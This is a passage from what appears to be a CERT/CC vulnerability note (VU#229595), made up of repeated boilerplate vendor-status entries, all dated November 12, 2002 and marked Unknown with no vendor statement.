Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Cistron Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Command Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Compaq Computer Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Computer Associates Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Conectiva Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Covalent Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Cray Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### CyberSoft Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### D-Link Systems Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Data Fellows Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Data General Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Data General Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Debian Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Djbdns Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Engarde Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### F-Secure Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### F5 Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Finjan Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### FreeBSD Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### FreeRADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Fujitsu Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Funk Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### GFI Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### GNU glibc Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Heimdal Kerberos Project Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### InfoBlox Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Intel Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### InterSoft International Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Interlink Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Juniper Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### KTH Kerberos Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Lachman Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Lotus Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Lucent Technologies Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### MIT Kerberos Development Team Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Macromedia Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Madgoat Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### MandrakeSoft Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Men&amp;Mice Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### MetaSolv Software Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Microsoft Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Multinet Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### NCFTP Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### NCSA Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### NEC Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### NET-SNMP Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### NeXT Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### NetBSD Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Network Appliance Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Nixu Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Nokia Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Nortel Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Open Group Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### OpenBSD Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### OpenSSH Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Oracle Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Putty Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### RADIUSClient Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### RSA Security Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Riverstone Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### SGI Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Sendmail Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Sequent Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Sequent Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### ShadowSupport Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23229595 Feedback>).\n\n### Sony Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us 